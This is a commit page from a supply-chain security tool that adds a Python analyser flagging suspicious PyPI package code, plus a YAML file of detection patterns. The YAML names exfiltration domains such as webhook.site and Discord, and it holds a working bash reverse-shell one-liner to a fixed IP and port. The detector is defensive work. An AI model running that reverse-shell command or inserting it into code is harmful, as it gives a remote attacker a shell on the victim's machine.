Skip to content

Commit

Permalink
chore: implement method to validate suspicious packages for malicious…
Browse files Browse the repository at this point in the history
… behavior
  • Loading branch information
Yao-Wen-Chang committed Sep 4, 2024
1 parent 6c305a9 commit 9ebfdc9
Show file tree
Hide file tree
Showing 4 changed files with 540 additions and 22 deletions.
339 changes: 339 additions & 0 deletions src/macaron/malware_analyzer/pypi_heuristics/pypi_source_extractor.py
Original file line number Diff line number Diff line change
@@ -0,0 +1,339 @@
# Copyright (c) 2024 - 2024, Oracle and/or its affiliates. All rights reserved.
# Licensed under the Universal Permissive License v 1.0 as shown at https://oss.oracle.com/licenses/upl/.

"""
Detect suspicious function calls in the code and trace the arguments back to their original values.
This allows for deeper analysis of potentially malicious behavior.
"""

import ast
import logging
import os
import pathlib
import re

import yaml

from macaron.json_tools import JsonType
from macaron.slsa_analyzer.package_registry.pypi_registry import PyPIPackageJsonAsset

logger: logging.Logger = logging.getLogger(__name__)


class PyPISuspiciousCodeExtractor:
    """Extract suspicious content from the source code of a PyPI package.

    On construction, the package source code and the patterns in ``suspicious_pattern.yaml`` are loaded. Every
    source entry that imports a module listed under the ``imports`` key of the pattern is then analysed for
    suspicious function calls.
    """

    # Regex fragments used by the line-based import fallback.
    # A module name is one or more words separated by single periods. The separator is mandatory between
    # words so that the expression is unambiguous; an optional separator matches the same strings but
    # backtracks exponentially on long identifiers when the rest of the pattern fails.
    _MODULE_NAME = r"\w+(?:\.\w+)*"
    # An alias clause such as " as np".
    _ALIAS_PATTERN = r"\s+as\s+\w+(?:\.\w+)*"

    # Standard import statement: import <module_name(s)> <other_text>
    # <module_name(s)> is a comma separated list of module names with optional aliases.
    # <other_text> is anything that follows a whitespace character or a hash (#).
    _IMPORT_PATTERN = (
        r"(?:import\s+)("
        + _MODULE_NAME
        + r"(?:"
        + _ALIAS_PATTERN
        + r")?"
        + r"(?:(?:\s*,\s*)(?:"
        + _MODULE_NAME
        + r"(?:"
        + _ALIAS_PATTERN
        + r")?))*)(?:(?:\s|#).*)?"
    )

    # From import statement: from <module_name> import <module_component(s)>
    # <module_name> may be preceded by any number of periods (relative import); only one module is allowed.
    # <module_component(s)> is a comma separated list of words (no periods) with optional aliases.
    _FROM_IMPORT_PATTERN = (
        r"(?:from\s+)([.]*"
        + _MODULE_NAME
        + r")(?:\s+import\s+(\w+(?:\s+as\s+\w+)?(?:(?:\s*,\s*)(?:\w+(?:\s+as\s+\w+)?))*))"
    )

    # The combined pattern has three capture groups:
    # 1 - modules of a standard import statement.
    # 2 - module of a from import statement.
    # 3 - components of a from import statement.
    # Compiled once because it is applied to every line of every unparsable file.
    _IMPORT_LINE_RE = re.compile(f"^(?:{_IMPORT_PATTERN})|(?:{_FROM_IMPORT_PATTERN})$")

    def __init__(self, pypi_package_json: PyPIPackageJsonAsset) -> None:
        """Collect required data for analysing the source code.

        Parameters
        ----------
        pypi_package_json: PyPIPackageJsonAsset
            The asset whose ``get_sourcecode()`` result is analysed.
        """
        self.source_code: dict[str, str] | None = pypi_package_json.get_sourcecode()
        suspicious_pattern: dict[str, JsonType] | None = self._load_suspicious_pattern()
        self.extracted_data: dict[str, JsonType] = {}
        if self.source_code and suspicious_pattern:
            self.extracted_data = self._extract_data_from_source(suspicious_pattern)

    def _load_suspicious_pattern(self) -> dict[str, JsonType] | None:
        """Load the suspicious patterns from suspicious_pattern.yaml located next to this module.

        Returns
        -------
        dict[str, JsonType] | None
            The suspicious pattern, or None if the file cannot be read, cannot be parsed,
            or does not contain a mapping at the top level.
        """
        pattern_file = pathlib.Path(__file__).parent.absolute() / "suspicious_pattern.yaml"
        try:
            with open(pattern_file, encoding="utf-8") as file:
                loaded = yaml.safe_load(file)
        except OSError as os_error:
            # A missing or unreadable pattern file disables the analysis instead of crashing the caller.
            logger.debug("Error reading the yaml file: '%s'", os_error)
            return None
        except yaml.YAMLError as yaml_exception:
            logger.debug("Error parsing the yaml file: '%s'", yaml_exception)
            return None

        if not isinstance(loaded, dict):
            # An empty document loads as None and a top-level list loads as a list; neither is usable.
            logger.debug("The yaml file '%s' does not contain a mapping.", pattern_file)
            return None
        return loaded

    def _extract_data_from_source(self, suspicious_pattern: dict[str, JsonType]) -> dict[str, JsonType]:
        """Extract the suspicious calls from every source entry that imports a suspicious module.

        Parameters
        ----------
        suspicious_pattern: dict[str, JsonType]
            The suspicious pattern defined in the suspicious_pattern.yaml

        Returns
        -------
        dict[str, JsonType]
            The suspicious behaviours within the source code. When something is found, the key
            ``suspicious_content`` maps each filename to the list of findings for that file.
        """
        logger.debug("Extracting required data for source code analysis")
        extracted_data: dict[str, JsonType] = {}
        if not self.source_code or not suspicious_pattern:
            return extracted_data

        pattern_imports = suspicious_pattern.get("imports")
        if not isinstance(pattern_imports, list):
            # Without a list of suspicious imports no file can be selected for analysis.
            return extracted_data
        # Built once; only strings can ever equal an extracted import name.
        suspicious_imports: set[str] = {name for name in pattern_imports if isinstance(name, str)}

        findings: dict[str, JsonType] = {}
        for filename, content in self.source_code.items():
            try:
                imports = self._extract_imports_from_ast(content)
            except (SyntaxError, ValueError):
                # ValueError is raised for source containing null bytes on Python versions before 3.12.
                imports = self._extract_imports_from_lines(content)

            target_imports = imports & suspicious_imports
            if not target_imports:
                continue

            # Found suspicious import in the source code.
            try:
                suspicious_content: list[JsonType] | None = extract_suspicious_content(
                    content, target_imports, suspicious_pattern
                )
            except (SyntaxError, ValueError) as parse_error:
                # The call analysis needs a full AST; content that only the line-based
                # import fallback could handle cannot be analysed any further.
                logger.debug("Unable to parse '%s' for suspicious content: %s", filename, parse_error)
                continue

            if suspicious_content:
                findings[filename] = suspicious_content

        if findings:
            extracted_data["suspicious_content"] = findings

        # TODO: implement the setup.py analysis as another heuristic or as malware validation.
        # Idea: catch the install_requires packages with r"install_requires\s*=\s*\[(.*?)\]" and report them
        # when they intersect the suspicious imports and fewer than 4 packages are required (a threshold
        # based on historical malwares).
        # TODO: Implement other suspicious setup in suspicious_pattern.yaml
        return extracted_data

    def get_extracted_data(self) -> dict[str, JsonType]:
        """Get the data extracted from the source code.

        Returns
        -------
        dict[str, JsonType]
            The data required for analysis.
        """
        return self.extracted_data

    def _extract_imports_from_ast(self, content: str) -> set[str]:
        """Extract imports from source code using the parsed AST.

        Parameters
        ----------
        content: str
            The source code as a string.

        Returns
        -------
        set[str]
            The set of imports. A ``from`` import contributes both the module and every
            ``module.name`` combination; relative modules keep their leading periods.

        Raises
        ------
        SyntaxError
            If the code could not be parsed.
        """
        imports: set[str] = set()
        for node in ast.walk(ast.parse(content)):
            if isinstance(node, ast.Import):
                imports.update(alias.name for alias in node.names)
            elif isinstance(node, ast.ImportFrom) and node.module:
                # ``from . import x`` has no module name and is skipped.
                module = "." * node.level + node.module
                imports.add(module)
                imports.update(f"{module}.{alias.name}" for alias in node.names)
        return imports

    def _extract_imports_from_lines(self, content: str) -> set[str]:
        """Extract imports from source code using per line pattern matching.

        This is the fallback for source code that cannot be parsed into an AST.

        Parameters
        ----------
        content: str
            The source code as a string.

        Returns
        -------
        set[str]
            The set of imports.
        """
        imports: set[str] = set()
        for raw_line in content.splitlines():
            # Strip the line so that indented imports and trailing whitespace do not defeat the pattern.
            match = self._IMPORT_LINE_RE.match(raw_line.strip())
            if not match:
                continue

            plain_modules, from_module, from_components = match.groups()
            if plain_modules:
                # Standard import, handle commas and aliases if present.
                imports.update(self._prune_aliased_lines(plain_modules, self._ALIAS_PATTERN))
            elif from_module:
                # From import
                imports.add(from_module)
                if from_components:
                    imports.update(
                        f"{from_module}.{component}"
                        for component in self._prune_aliased_lines(from_components, self._ALIAS_PATTERN)
                    )
        return imports

    def _prune_aliased_lines(self, text: str, alias_pattern: str) -> list[str]:
        """Split the line on commas and remove any aliases from individual parts.

        Parameters
        ----------
        text: str
            The comma separated names, each optionally followed by an alias clause.
        alias_pattern: str
            The regular expression matching an alias clause.

        Returns
        -------
        list[str]
            The names without surrounding whitespace and without aliases, in their original order.
        """
        return [re.sub(alias_pattern, "", part.strip()) for part in text.split(",")]


class FunctionCallAnalyzer(ast.NodeVisitor):
    """Collect the arguments passed to calls made on suspicious modules.

    While walking the tree, simple assignments (``name = <constant>`` and ``name = other_name``) are recorded
    so that a variable passed to a suspicious call can be traced back to the value it was assigned.
    """

    def __init__(self, target_import_modules: set[str], suspicious_pattern: dict[str, JsonType]) -> None:
        """Initialise the analyzer.

        Parameters
        ----------
        target_import_modules: set[str]
            The suspicious modules imported by the analysed code.
        suspicious_pattern: dict[str, JsonType]
            The pattern defined in suspicious_pattern.yaml
        """
        self.targets: list[JsonType] = []
        self.suspicious_modules: set[str] = target_import_modules
        self.suspicious_pattern: dict[str, JsonType] = suspicious_pattern
        self.assignments: dict = {}  # Store the assignment for dataflow analysis
        # Names in ``assignments`` whose stored value is another variable name rather than a constant.
        # Needed to tell ``a = b`` apart from ``a = "b"``, which are stored identically.
        self._alias_vars: set[str] = set()

    def get_targets(self) -> list[JsonType]:
        """Get the argument values of the suspicious function calls.

        Returns
        -------
        list[JsonType]
            One dictionary per collected argument with the keys ``suspicious_arg`` and ``line_num``.
        """
        return self.targets

    def visit_Module(self, node: ast.Module) -> None:  # noqa: N802 # pylint: disable=C0103
        """Visit all root node."""
        self.generic_visit(node)

    def visit_Call(self, node: ast.Call) -> None:  # noqa: N802 # pylint: disable=C0103
        """Record the positional arguments of ``<suspicious module>.<attribute>(...)`` calls."""
        func = node.func
        if (
            isinstance(func, ast.Attribute)
            and isinstance(func.value, ast.Name)
            and self._find_module_in_node(func.value.id)
        ):
            for arg in node.args:
                if isinstance(arg, ast.Name):  # Argument is a variable
                    resolved = self._resolve_variable(arg.id)
                    self.targets.append({"suspicious_arg": resolved, "line_num": node.lineno})
                elif isinstance(arg, ast.Constant):  # Argument is a constant, e.g. a string
                    self.targets.append({"suspicious_arg": arg.value, "line_num": node.lineno})
        # Keep descending so that nested calls in the arguments are analysed as well.
        self.generic_visit(node)

    def visit_Assign(self, node: ast.Assign) -> None:  # noqa: N802 # pylint: disable=C0103
        """Record constant and variable-to-variable assignments, then visit the assigned expression."""
        value = node.value
        for target in node.targets:  # ``a = b = value`` has several targets
            if not isinstance(target, ast.Name):
                continue
            if isinstance(value, ast.Constant):
                # Handle constant assignments
                self.assignments[target.id] = value.value
                self._alias_vars.discard(target.id)
            elif isinstance(value, ast.Name):
                # Handle variable-to-variable assignments
                self.assignments[target.id] = value.id
                self._alias_vars.add(target.id)
        # Without this the right-hand side is never visited and calls such as
        # ``response = requests.get(url)`` would be missed.
        self.generic_visit(node)

    def _resolve_variable(self, name: str) -> JsonType:
        """Follow the recorded assignments from a variable name to the value it refers to.

        Resolution stops at the first constant, at a name without a recorded assignment, or when a name
        is reached for the second time (cyclic assignments such as ``a = b; b = a``).
        """
        seen: set[str] = set()
        current = name
        while current in self.assignments and current not in seen:
            seen.add(current)
            value = self.assignments[current]
            if current not in self._alias_vars:
                # A constant is final even if its text equals the name of another variable.
                return value
            current = value
        return current

    def _find_module_in_node(self, node_module: str) -> str | None:
        """Return the module name if it is listed under ``imports`` in the suspicious pattern, else None."""
        suspicious_imports = self.suspicious_pattern.get("imports")
        if isinstance(suspicious_imports, list) and node_module in suspicious_imports:
            return node_module
        return None


def extract_suspicious_content(
    code: str, target_import_modules: set[str], suspicious_pattern: dict[str, JsonType]
) -> list[JsonType] | None:
    """
    Parse the source code into an Abstract Syntax Tree (AST) and analyze the nodes for suspicious activity.

    Parameters
    ----------
    code : str
        The source code of the script to be analyzed.
    target_import_modules : set[str]
        The set of target modules to discover from the AST nodes.
    suspicious_pattern: dict[str, JsonType]
        The pattern defined in suspicious_pattern.yaml

    Returns
    -------
    list[JsonType] | None
        A list of dictionaries, one per argument found in a suspicious call, with the following details:
        - line_num (int): The line number in the source code where the suspicious call is made.
        - suspicious_arg: The suspicious content or argument involved in the call.
        None is returned when nothing was found or when the code cannot be parsed.

    Example
    -------
    A list of dictionaries with suspicious findings:
    [
        {"line_num": 42, "suspicious_arg": "http://suspicious-remote.com"},
        {"line_num": 85, "suspicious_arg": "ADDASEFV=="}
    ]
    """
    try:
        tree = ast.parse(code)
    except (SyntaxError, ValueError):
        # The analysed code is untrusted and may not be valid Python. ValueError is raised for source
        # containing null bytes on Python versions before 3.12. Unparsable code yields no findings.
        return None

    analyzer = FunctionCallAnalyzer(target_import_modules, suspicious_pattern)
    analyzer.visit(tree)
    # An empty result is reported as None.
    return analyzer.get_targets() or None
Original file line number Diff line number Diff line change
@@ -0,0 +1,52 @@
# Copyright (c) 2024 - 2024, Oracle and/or its affiliates. All rights reserved.
# Licensed under the Universal Permissive License v 1.0 as shown at https://oss.oracle.com/licenses/upl/.

# This file defines the functions and modules that can trigger
# malicious behaviours.
# Some patterns defined here might be deprecated in newer versions, but we still keep them here.
# The patterns defined here are based on historical malware.

imports:
- requests
- base64
- Fernet
# - getpass
# - platform
# - os

pacakges:
- name:
- requests
method:
- get
- post

- name:
- exec

- name:
- subprocess.
method:
- Popen

domains:
- webhook.site
- discord
- telegram

local_path:
- /storage/emulated/0/ # Android: primary user account on the device

setup:
- cmdclass # Replace the pip command, for example `install`
- install_requires
- setup_requires # Deprecated

file_postfix:
- .exe

reverse_shell:
- bash -c "bash -i >& /dev/tcp/81.46.246.181/4444 0>&1"

other:
- os.name = "nt"
Loading

0 comments on commit 9ebfdc9

Please sign in to comment.